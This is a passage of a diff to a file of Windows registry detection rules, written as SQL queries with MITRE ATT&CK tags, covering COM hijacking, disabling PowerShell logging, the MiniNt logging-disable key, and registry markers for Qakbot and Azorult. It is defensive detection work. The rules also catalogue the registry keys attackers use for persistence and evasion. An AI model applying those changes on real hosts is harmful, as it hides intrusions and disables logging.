Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" + "filename": "registry_set_asep_reg_keys_modification_common.yml" }, { - "title": "Registry Hide Function from User", - "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", - "status": "test", - "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", - "author": "frack113", + "title": "Potential Persistence Via COM Search Order Hijacking", + "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "status": "experimental", + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate admin script" + "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (NewValue LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewValue LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_hide_function_user.yml" + "filename": "registry_set_persistence_search_order.yml" }, { - "title": "Potential Persistence Using DebugPath", - "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "title": "ScreenSaver Registry Key Set", + "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "status": "experimental", - "description": "Detects potential persistence using Appx DebugPath", - "author": "frack113", + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Legitimate use of screen saver" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND NewValue LIKE '%.scr' ESCAPE '\\') AND NOT ((NewValue LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_appx_debugger.yml" + "filename": "registry_set_scr_file_executed_by_rundll32.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Disable Windows Security Center Notifications", - "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "title": "Allow RDP Remote Assistance Feature", + "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", "status": "experimental", - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate use of the feature (alerts should be investigated either way)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_disable_security_center_notifications.yml" + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" }, { - "title": "Enable Microsoft Dynamic Data Exchange", - "id": "63647769-326d-4dde-a419-b925cc0caf42", - "status": "test", - "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "title": "Potential Persistence Using DebugPath", + "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "status": "experimental", + "description": "Detects potential persistence using Appx DebugPath", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1559.002" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_office_enable_dde.yml" + "filename": "registry_set_persistence_appx_debugger.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1112" ], "falsepositives": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", - "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", + "status": "experimental", + "description": "Detects the modification of the registry to disable a system restore on the computer", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Common Autorun Keys Modification", - "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR NewValue IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_common.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "WinSock2 Autorun Keys Modification", - "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "New Root or CA or AuthRoot Certificate to Store", - "id": "d223b46b-5621-4037-88fe-fda32eead684", - "status": "experimental", - "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", - "author": "frack113", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "status": "test", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' 